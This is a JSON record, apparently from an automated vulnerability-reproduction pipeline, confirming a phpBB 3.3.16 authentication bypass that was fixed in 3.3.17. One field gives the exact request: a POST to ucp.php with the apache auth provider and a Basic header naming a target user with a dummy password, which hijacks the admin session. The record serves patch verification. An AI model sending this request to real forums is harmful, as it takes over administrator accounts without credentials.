{
  "entrypoint_kind": "api_remote",
  "entrypoint_detail": "ucp.php?mode=login_link&auth_provider=apache&login_link_aikido=1 (POST, Authorization: Basic <targetuser:x>)",
  "service_started": true,
  "healthcheck_passed": true,
  "target_path_reached": true,
  "runtime_stack": [
    "apache2.4",
    "mod_php8.2",
    "phpBB-3.3.x",
    "sqlite3"
  ],
  "proof_artifacts": [
    "logs/reproduction_steps.log",
    "logs/vuln_exploit_response.txt",
    "logs/vuln_setcookie_summary.txt",
    "logs/fixed_exploit_ctrl_response.txt",
    "logs/fixed_setcookie_summary.txt",
    "repro/artifacts/vuln/exploit_response.txt",
    "repro/artifacts/vuln/cookies.txt",
    "repro/artifacts/vuln/index_with_session.html",
    "repro/artifacts/fixed/exploit_ctrl_response.txt",
    "repro/artifacts/fixed/cookies_ctrl.txt"
  ],
  "notes": "vulnerable 3.3.16: exploit sets session _u=2 (admin id=2) -> admin account hijacked without password; fixed 3.3.17: same exploit leaves _u=1 (anonymous) and shows a login error. hijack=true blocked=true"
}
